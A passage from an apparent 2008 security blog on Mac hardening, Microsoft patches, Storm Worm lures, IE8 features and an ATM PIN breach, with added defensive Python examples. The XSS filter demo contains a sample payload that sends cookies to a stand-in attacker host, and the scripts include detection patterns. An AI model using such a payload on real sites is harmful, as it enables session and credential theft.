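    """JavaScript plus an auto-run trigger is the signature of this lure."""
    if "_error" in hits:
        return "error"
    has_js = "/JavaScript" in hits or "/JS" in hits
    auto_run = "/OpenAction" in hits or "/AA" in hits
    if has_js and auto_run:
        return "high"
    if has_js or "/Launch" in hits or "/EmbeddedFile" in hits:
        return "medium"
    if hits["_streams_compressed"]:
        return "unknown"   # inflate the object streams before calling it clean
    return "low"


if __name__ == "__main__":
    for label, pdf in (("malicious", MALICIOUS_PDF), ("benign", BENIGN_PDF)):
        hits = scan_pdf(pdf)
        print(label, risk_score(hits), hits)
```

    The "unknown" tier is deliberate: real samples usually wrap their objects in Flate-compressed streams, where a plain byte scan sees nothing, so a scanner that reports "low" in that case is giving false comfort. A full triage inflates those streams first and then runs the same name check over the decoded content.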

  • Apple Macintosh computers - Keeping them secure in the corporate environment

    In the Sarbanes-Oxley forums, a good question was asked related to keeping Mac systems protected. Security is more of a "process" than something tied to particular hardware or software. In other words, you should take the same precautionary protective measures for Apple workstations as for Windows client PCs.

    For the most part, Apple Mac computers have enjoyed a fairly good track record when it comes to security. There are fewer in-the-wild threats, and Mac OS X is built on a BSD-derived Unix foundation (the XNU kernel) that is fairly secure by design. That does not make it immune: phishing, malicious downloads and unpatched third-party software affect it just like any other platform.

    Still, security is only as strong as its weakest link. Thus you want a strong chain-link fence to keep the fox out of the chicken coop.

    Recommendations:

    1. Keep all operating system, browser, and software products as up-to-date as possible on security patches.

    2. Anti-virus software (anti-spyware might be beneficial also)

    3. Firewall protection is always a must

    4. Authentication to networks (with strong password settings, rotations, and other best practices)

    5. Security policies that include the Mac environment (e.g., discouraging too much personal use, installation of non-business software, etc)

    6. Use of Firefox 3 might be beneficial to look at as a complementary browser to Safari (which has suffered some recent security issues)

    7. Tracking of Apple security exposures and risks as they develop (e.g., monitor Secunia, Internet Storm Center, Apple's security bulletins, FRSIRT, etc)

    As noted, this list is fairly similar to keeping Windows client PCs secure. These additional links might help:

    http://www.google.com/search?hl=en&q=corporate+macintosh+security+best+practices
    https://security.berkeley.edu/mac.html
    http://www.networkworld.com/news/2007/022707-mac-os-going-corporate.html

  • Microsoft Security Updates - July 2008 includes SQL-Server update

    Microsoft has released this month's patches as part of its usual Patch Tuesday monthly cycle. This month's patches are:

    MS08-037 - Vulnerabilities in DNS Could Allow Spoofing (953230)

    Affects: Windows 2000, XP (inc x64), Server 2003 (inc x64), Server 2008 (inc x64)
    Link: http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx


    MS08-038 - Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)

    Affects: Windows Vista and Windows 2008 Server
    Link: http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx


    MS08-039 - Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
    Affects: Microsoft Exchange Server 2003 & 2007
    Link: http://www.microsoft.com/technet/security/Bulletin/MS08-039.mspx


    MS08-040 - Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
    Affects: SQL Server 7, 2000, 2005, MSDE 1.0, SQL 2000 Desktop Engine, SQL 2005 Express Edition, Windows 2000, Server 2003 & Server 2008
    Link: http://www.microsoft.com/technet/security/Bulletin/MS08-040.mspx


    Additional Links:  

    Microsoft: http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
    MS Blog: http://blogs.technet.com/msrc/archive/2008/07/08/july-2008-bulletin-monthly-release.aspx
    ISC: http://isc.sans.org/diary.html?storyid=4684

    So far, the July updates are working well on my XP SP3 PCs at home and work ...

    IMPORTANT NOTE -- Don't forget to patch SQL-Server as applicable (after pilot testing your web or client/server based applications)

  • IT Project management - Excellent collection of resources

    The 100th edition of the ALLPM Today Newsletter shares some excellent resources; the most popular articles for each year are highlighted below:

    Most Popular allPM Article (for all years) - Communication in the Workplace
    By Kate McLeod, PMP

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1910

    Most popular ALLPM articles for each year:

    Most Popular 2002 Article - Project Management Best Practice #3 -"Strategic Planning for Project Management"
    By Dr. Harold Kerzner

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1909

    Most Popular 2003 Article - Understanding the PRINCE2 Processes - Part One
    By David Whelbourn

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1908

    Most Popular 2004 Article - The True Meaning of Teamwork
    By Sloan Campbell MBA, PMP

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1907

    Most Popular 2005 Article - Acceptance Criteria - Part I & II,
    By Eoin Callan (MBA, PMP)

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1906

    Most Popular 2006 Article - Why Does a Project Need a Project Manager and a Business Analyst
    By Barbara Carkenord

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1905

    Most Popular 2007 Article - The Essence of OPM3®
    By Ralf Friedrich

    http://allpm.com/modules.php?op=modload&name=News&file=article&sid=1904

  • Storm Worm - Avoid July 4th topics offering Fireworks display

    As noted in Gary Warner's excellent blog post, be wary of email messages carrying the following subjects and bodies in your inbox:

    Storm Worm - Avoid July 4th topics offering Fireworks display
    http://isc.sans.org/diary.html?storyid=4669
    http://garwarner.blogspot.com/2008/07/storm-worm-salutes-our-nation-on-4th.html

    QUOTE: The website, which seems to invite visitors to play a fireworks video, actually downloads the Storm malware in the form of an executable called "fireworks.exe".

    Subjects
    =================
    Amazing firework 2008
    America the Beautiful
    American Independence Day
    Bright and joyful Fourth of July
    Celebrate Independence
    Celebrating Fourth of July
    Celebrating the Glory of our Nation
    Celebrating the spirit of our Country
    Celebrations have already begun
    Fabulous Independence Day firework
    God bless America
    Happy Birthday, America!
    Happy Independence Day
    Happy Independence Day!!
    Independence Day firework broke all records *
    Spectacular fireworks show
    Stars and Strips forever
    The best of 4th of July Salute
    Time for Fireworks
    Wish your friends a happy Independence Day


    Bodies
    =================
    Amazing Independence Day show
    America the Beautiful
    Celebrating the Glory of our Nation
    God bless America
    Sparkling Celebration of Independence Day
    Stars and Strips forever
    Super 4th!
    The best firework you've ever seen
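
    The lure list above is exactly the kind of input a mail gateway rule consumes. The script below is an added example (not part of the post or of Gary Warner's write-up): it parses constructed sample messages, normalises the subject the same way the lure list is normalised, and quarantines anything that matches a listed subject or body line, references the quoted payload name "fireworks.exe", or links to a bare-IP host. The bare-IP check is an added heuristic of mine, not something the post states, and the three sample messages are constructed.

```python
import email
import re
from email import policy

# Subjects and bodies quoted in the post above (the Storm July 4th lure list).
STORM_LURES_RAW = [
    "Amazing firework 2008", "America the Beautiful", "American Independence Day",
    "Bright and joyful Fourth of July", "Celebrate Independence",
    "Celebrating Fourth of July", "Celebrating the Glory of our Nation",
    "Celebrating the spirit of our Country", "Celebrations have already begun",
    "Fabulous Independence Day firework", "God bless America",
    "Happy Birthday, America!", "Happy Independence Day",
    "Happy Independence Day!!", "Independence Day firework broke all records *",
    "Spectacular fireworks show", "Stars and Strips forever",
    "The best of 4th of July Salute", "Time for Fireworks",
    "Wish your friends a happy Independence Day",
    # body strings from the same list
    "Amazing Independence Day show", "Sparkling Celebration of Independence Day",
    "Super 4th!", "The best firework you've ever seen",
]

def normalise(text: str) -> str:
    """Lower-case, collapse whitespace and drop trailing punctuation so that
    'Happy Independence Day!!' and 'happy independence day' compare equal."""
    text = re.sub(r"\s+", " ", text or "").strip().lower()
    return text.rstrip("!*. ").strip()

STORM_LURES = {normalise(s) for s in STORM_LURES_RAW}

# fireworks.exe is the payload name quoted from the ISC / Gary Warner write-up.
# The bare-IP URL check is an added heuristic (assumption), not from the post.
EXE_RE = re.compile(r"\bfireworks\.exe\b", re.I)
BARE_IP_URL_RE = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}\b", re.I)

def score_message(raw: str) -> dict:
    """Parse one RFC 822 message and return a verdict with the reasons for it."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    part = msg.get_body(preferencelist=("plain", "html"))
    text = part.get_content() if part is not None else ""
    reasons = []
    if normalise(subject) in STORM_LURES:
        reasons.append("subject matches Storm July 4th lure list")
    for line in text.splitlines():
        if normalise(line) in STORM_LURES:
            reasons.append("body line matches Storm lure list")
            break
    if EXE_RE.search(text):
        reasons.append("references fireworks.exe")
    if BARE_IP_URL_RE.search(text):
        reasons.append("link to a bare-IP host")
    verdict = "quarantine" if reasons else "deliver"
    return {"subject": subject, "verdict": verdict, "reasons": reasons}

def scan(messages):
    return [score_message(m) for m in messages]

# Constructed sample messages (not real captures).
SAMPLES = [
    "From: friend@example.com\r\nTo: you@example.com\r\nSubject: Happy Independence Day!!\r\n\r\n"
    "God bless America\r\nhttp://192.0.2.10/\r\n",
    "From: boss@example.com\r\nTo: you@example.com\r\nSubject: Q3 budget review\r\n\r\n"
    "Please send me the revised spreadsheet by Friday.\r\n",
    "From: cousin@example.com\r\nTo: you@example.com\r\nSubject: Pictures from the lake\r\n\r\n"
    "Video of the show is here: http://203.0.113.5/fireworks.exe\r\n",
]

if __name__ == "__main__":
    for r in scan(SAMPLES):
        print(r["verdict"].upper(), "-", r["subject"], r["reasons"])
```

    Subject matching alone is brittle (the Storm crew rotated subjects within days), which is why the payload-name and bare-IP checks are combined with it: the third sample matches no listed subject but is still caught by the link it carries.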

  • Internet Explorer 8 Beta 2 - Will focus on security improvements

    Two recent ZDNet blog posts highlight forthcoming security improvements for the next beta release of IE 8.  The release to testers is planned for August.  These improvements will make IE8 a worthwhile upgrade when it is released in the future.

    Internet Explorer 8 Beta 2 - Will focus on security improvements
    http://blogs.zdnet.com/security/?p=1396
    http://blogs.zdnet.com/Bott/?p=484

    QUOTE: When Microsoft's Internet Explorer 8 hits the Beta 2 milestone in August, the browser makeover will feature a full-fledged anti-malware blocker and new protections against some forms of cross-site scripting attacks. The existing phishing filter in IE 7 has been renamed SmartScreen Filter and will include blacklist-based blocking of known exploit sites.  Also new in IE 8 Beta 2 is an XSS Filter to detect Type-1 (reflection) attacks that can lead to cookie theft, keystroke logging, Web site defacement and credentials theft.

    The new beta refresh will also include support for safer Web 2.0-type mashups, DEP (data execution protection) turned on by default in Windows Vista SP 1, domain highlighting to help flag phishing attacks and changes to the way ActiveX controls are handled.
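
    To make the "Type-1 (reflection)" idea concrete, here is an added example of the core check such a filter performs; it is my illustration, not IE8's code, and the token list and the '#' neutering are simplifications of whatever Microsoft actually shipped (the page does not describe the internals). A reflected attack only works when a script-like value from the request URL is echoed verbatim into the response, so the filter looks for exactly that pairing. The URL, payload and both response bodies are constructed.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl, quote

# Tokens that mark a parameter value as script-like. Illustrative set only;
# IE8's real heuristics are assumed to be richer than this.
SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript\s*:|\bon\w+\s*=|<\s*iframe|<\s*img", re.I)

def script_like_params(url: str) -> list:
    """Decoded query parameters whose value contains a script marker."""
    query = urlsplit(url).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if SCRIPT_RE.search(v)]

def neuter(token: str) -> str:
    # Insert '#' after the first character so '<script' becomes '<#script'
    # and no longer parses as a tag. (Illustrative, not IE8's exact edit.)
    return token[0] + "#" + token[1:]

def filter_response(url: str, body: str):
    """Reflected-XSS check: a script-like request value that appears verbatim
    in the response is neutered. Returns (filtered_body, hit_param_names)."""
    hits, out = [], body
    for name, value in script_like_params(url):
        if value in out:            # echoed unescaped: reflection confirmed
            hits.append(name)
            out = out.replace(value, SCRIPT_RE.sub(lambda m: neuter(m.group(0)), value))
    return out, hits

# Constructed request and responses; no real site involved.
PAYLOAD = "<script>document.location='http://attacker.test/?'+document.cookie</script>"
ATTACK_URL = "http://search.example.test/?q=" + quote(PAYLOAD)
BENIGN_URL = "http://search.example.test/?q=fireworks+show"
VULN_BODY = f"<html><body>Results for: {PAYLOAD}</body></html>"
SAFE_BODY = f"<html><body>Results for: {html.escape(PAYLOAD, quote=True)}</body></html>"

if __name__ == "__main__":
    print(filter_response(ATTACK_URL, VULN_BODY))
    print(filter_response(ATTACK_URL, SAFE_BODY))
    print(script_like_params(BENIGN_URL))
```

    Two things worth noticing: the filter does nothing when the site HTML-escapes the echoed value (SAFE_BODY), because the attacker's string never reaches the page intact, so the browser-side filter is a backstop for sites that fail at output encoding, not a substitute for it; and a token list like this one will occasionally fire on legitimate values (a parameter value such as "onion=true" trips the event-handler pattern), which is the false-positive trade-off any such filter carries.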

    Below is also an overview of security improvements found in the current beta version:

    Internet Explorer 8 - Two New Security Improvements
    http://www.itsecurity.com/features/ie8-security-features-032408/

    QUOTE:  IE 8's security environment benefits from the addition of two major enhancements: the Safety Filter tool and the Domain Highlighting feature. Here's a closer look at both of these new enhancements.

    1. Safety Filter -- IE 8 ups the ante with a new Safety Filter that analyzes the entire URL string to search for carefully hidden signs that a Web site may be something other than it claims to be. In Microsoft's words, the Safety Filter provides "a more granular detection" capability, allowing the browser to protect users from more targeted and sophisticated attacks.

    2. Domain Highlighting -- IE 8's other major new security feature is a technology that highlights the top-level domain in the browser's address bar. This enhancement might not sound like much, but it is designed to provide a hard-to-miss visual clue that will function like a traffic light. The idea is to enable users to quickly confirm that the Web site they are visiting is the site that they intended to visit.
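
    Domain highlighting depends on one computation: finding the registrable domain (the label directly left of the public suffix) so that "www.citibank.com.account-verify.example.net" highlights "example.net" rather than "citibank.com". The following is an added example of that computation, written by me rather than taken from IE8 or the ITsecurity.com article; it uses a constructed five-entry stand-in for the Public Suffix List, and all URLs are made up. It also shows the "user@host" trick, where everything before "@" is userinfo and the real host is what follows it.

```python
from urllib.parse import urlsplit

# Constructed subset of the Public Suffix List (assumption for the demo);
# a real implementation loads the full list and handles exceptions/wildcards.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk", "com.au"}

def registrable_domain(host: str):
    """Owner-controlled part of a hostname: the label just left of the longest
    known public suffix. None for IPv4 literals or unknown suffixes."""
    host = host.lower().rstrip(".")
    labels = host.split(".")
    if all(label.isdigit() for label in labels):   # IP literal: nothing to highlight
        return None
    for i in range(1, len(labels)):                 # longest suffix is tried first
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return None

def highlight(url: str) -> str:
    """Render the URL with the registrable domain in brackets, standing in for
    the address bar's bold/black text; everything else would be greyed."""
    parts = urlsplit(url)
    host = parts.hostname or ""          # userinfo before '@' is NOT the host
    reg = registrable_domain(host)
    shown = host if reg is None else host[: len(host) - len(reg)] + "[" + reg + "]"
    port = f":{parts.port}" if parts.port else ""
    tail = parts.path + (f"?{parts.query}" if parts.query else "")
    return f"{parts.scheme}://{shown}{port}{tail}"

# Constructed lookalike and legitimate URLs.
SAMPLE_URLS = [
    "http://www.citibank.com.account-verify.example.net/login",
    "http://www.citibank.com@login.example.net/",
    "https://online.bank.co.uk/",
    "http://192.0.2.10/fireworks.exe",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(highlight(u))
```

    The first two samples are the cases the feature is designed for: a long hostname that buries the real owner at the right-hand end, and a URL whose "citibank.com" text is userinfo that the browser discards. A bare IP gets no highlight at all, which is itself a useful signal.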

  • Identity Theft - Be careful where and how you use ATM cards

    In most cases, folks are safe to use ATMs for cash withdrawals, although this major security incident reported yesterday is alarming. 

    Citibank ATM breach reveals PIN security problems
    http://news.yahoo.com/s/ap/20080701/ap_on_hi_te/tec_atm_breach

    SAN JOSE, Calif. - Hackers broke into Citibank's network of ATMs inside 7-Eleven stores and stole customers' PIN codes, according to recent court filings that revealed a disturbing security hole in the most sensitive part of a banking record. The scam netted the alleged identity thieves millions of dollars. But more importantly for consumers, it indicates criminals were able to access PINs — the numeric passwords that theoretically are among the most closely guarded elements of banking transactions — by attacking the back-end computers responsible for approving the cash withdrawals.

    It's unclear how many Citibank customers were affected by the breach, which extended at least from October 2007 to March of this year and was first reported by technology news Web site Wired.com. The bank has nearly 5,700 Citibank-branded ATMs inside 7-Eleven Inc. stores throughout the U.S., but it doesn't own or operate any of them.

    That responsibility falls on two companies: Houston-based Cardtronics Inc., which owns all the machines but only operates some, and Brookfield, Wis.-based Fiserv Inc., which operates the others. A critical issue in the investigation is how the hackers infiltrated the system, a question that still hasn't been answered publicly. All that's known is they broke into the ATM network through a server at a third-party processor, which means they probably didn't have to touch the ATMs at all to pull off the heist.

    They could have gained administrative access to the machines - which means they had carte blanche to grab information - through a flaw in the network or by figuring out those computers' passwords. Or it's possible they installed a piece of malicious software on a banking server to capture unencrypted PINs as they passed through.
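
    The article's closing possibility, malware on a processor capturing "unencrypted PINs as they passed through", is worth unpacking, because a PIN that is merely formatted into a PIN block is not protected at all. The example below is mine, not from the AP article, and it assumes the ISO 9564 format-0 PIN block that ATM networks commonly use (the article does not say which format this processor used). A format-0 block is the PIN field XORed with part of the PAN; anyone who sees a clear block together with the PAN, which travels in the same authorization message, recovers the PIN with no key. Only the encryption of that block under a terminal or zone key, and keeping the decrypt-and-re-encrypt step inside an HSM rather than in host software, provides secrecy. The PAN and PIN values are constructed test data.

```python
def pin_field(pin: str) -> str:
    """ISO 9564 format-0 PIN field: control nibble 0, PIN length, PIN digits, F padding."""
    if not (pin.isdigit() and 4 <= len(pin) <= 12):
        raise ValueError("PIN must be 4 to 12 digits")
    return f"0{len(pin):X}{pin}".ljust(16, "F")

def pan_field(pan: str) -> str:
    """PAN field: 0000 followed by the 12 rightmost PAN digits excluding the check digit."""
    if not (pan.isdigit() and len(pan) >= 13):
        raise ValueError("PAN must be at least 13 digits")
    return "0000" + pan[:-1][-12:]

def format_pin_block(pin: str, pan: str) -> str:
    """Clear (not yet encrypted) format-0 PIN block, 16 hex digits."""
    return f"{int(pin_field(pin), 16) ^ int(pan_field(pan), 16):016X}"

def extract_pin(block: str, pan: str) -> str:
    """What a host (or an attacker on it) gets from a clear block plus the PAN:
    the PIN itself. The padding check is how a wrong PAN is detected."""
    field = f"{int(block, 16) ^ int(pan_field(pan), 16):016X}"
    if field[0] != "0":
        raise ValueError("not a format-0 block, or wrong PAN")
    length = int(field[1], 16)
    pin = field[2:2 + length]
    if not pin.isdigit() or field[2 + length:] != "F" * (14 - length):
        raise ValueError("padding check failed: wrong PAN or corrupted block")
    return pin

def pin_recoverable(block: str, pan: str) -> bool:
    """True when the block decodes cleanly against this PAN."""
    try:
        extract_pin(block, pan)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # Constructed test PAN and PIN (not real card data).
    pan, pin = "4111111111111111", "1234"
    block = format_pin_block(pin, pan)
    print("clear PIN block:", block)                    # what leaks if the block is seen unencrypted
    print("PIN recovered with PAN only:", extract_pin(block, pan))
    print("same PIN, other PAN:", format_pin_block(pin, "5500000000000004"))
```

    The design point: the PAN binding stops a block from being replayed against a different card, but it is not confidentiality. In a sound deployment the block leaves the ATM already encrypted under the terminal PIN key, and the processor's translation to the issuer's zone key happens inside an HSM, so the clear value above never exists in host memory where software could capture it.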
